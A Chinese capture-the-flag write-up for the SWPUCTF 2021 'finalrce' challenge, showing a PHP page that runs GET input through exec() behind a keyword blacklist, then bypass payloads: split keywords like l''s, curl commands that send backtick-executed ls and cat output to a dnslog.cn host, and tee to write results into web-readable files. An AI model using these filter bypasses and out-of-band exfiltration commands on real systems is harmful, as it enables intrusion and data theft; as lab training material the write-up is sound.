[SWPUCTF 2021 新生赛]finalrce

[SWPUCTF 2021 新生赛]finalrce wp

注:本文参考了 NSSCTF Leaderchen 师傅的题解,并修补了其中些许不足。

此外,参考了 命令执行(RCE)面对各种过滤,骚姿势绕过总结

题目代码:

复制代码
 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
} 

过滤了一堆字符。

这道题的 exec 函数理应返回执行结果的最后一行,但是却什么也不返回,所以需要一些其他的方法来看到命令执行的结果。

过滤关键字的绕过

首先我们知道关键字被过滤时可以使用以下绕过方式:

如 ls 被过滤,可以替换为

复制代码
l''s

l\s 

等等。

但是由于 $* 等字符被过滤了,这里能用的恐怕只有前两种。

了解了这些之后来构造几种 payload 。

DNSlog 带外命令执行

DNS 的网站这里写一下:

http://www.dnslog.cn

http://ceye.io

临时使用的话推荐去第一个网站。

复制代码
curl `l''s`.xf3njn.dnslog.cn

用反引号执行 ls 命令,执行的结果拼接到 xf3njn.dnslog.cn 域名上,然后访问,访问的日志可以在网站上看,就可以看到命令执行的结果。

ls 执行的结果是 index.php

这样的话我们直接查找根目录下包含 "f" 的文件:

复制代码
curl `l\s /|grep 'f'`.xf3njn.dnslog.cn

返回结果:

找到了。

查看 flag 文件:

这里因为 "la" 也被过滤了,所以多加了一个斜杠。

复制代码
curl `ca\t /flllll\aaaaaaggggggg`.xf3njn.dnslog.cn

返回结果中的大括号被去掉了,自己加上,另外把开头小写的 nssctf 改成大写就行了。

tee 关键字将结果保存到文件中

执行 ls 文件并将结果保存到当前目录的 1.txt 文件中:

复制代码
l\s|tee 1.txt

执行这条命令后去访问:http://node4.anna.nssctf.cn:28616/1.txt 就可以看到结果了:

这里因为我之前执行过一次,所以多了一个 1.txt 文件。

同理可以查看 flag :

复制代码
ca\t /flllll\aaaaaaggggggg|tee 2.txt

拿到 flag :

此外,还有 tac,head,tail 等命令也可以代替 cat 查看文件内容。

相关推荐
见青..1 小时前
【学习笔记】文件包含漏洞--本地远程包含、伪协议、加密编码
前端·笔记·学习·web安全·文件包含
lally.3 小时前
2025蓝桥杯省赛网络安全组wp
web安全·蓝桥杯
CyberSecurity_zhang3 小时前
汽车网络安全 -- 理解暴露面、攻击面和攻击向量
网络安全·信息安全·汽车
我最厉害。,。4 小时前
PHP 反序列化&原生类 TIPS&字符串逃逸&CVE 绕过漏洞&属性类型特征
android·开发语言·php
xiaoniu6678 小时前
毕业设计-基于机器学习入侵检测系统
网络·安全·web安全
2401_890665868 小时前
免费送源码:Java+ssm+HTML 三分糖——甜品店网站设计与实现 计算机毕业设计原创定制
java·python·微信小程序·html·php·课程设计·android-studio
Suckerbin10 小时前
pikachu靶场-敏感信息泄露
网络·学习·安全·网络安全
大G哥19 小时前
PHP标签+注释+html混写+变量
android·开发语言·前端·html·php
傻啦嘿哟19 小时前
HTTP代理基础:网络新手的入门指南
开发语言·php
自由鬼21 小时前
高性能的开源网络入侵检测和防御引擎:Suricata介绍
网络·安全·网络安全·开源·系统安全·入侵检测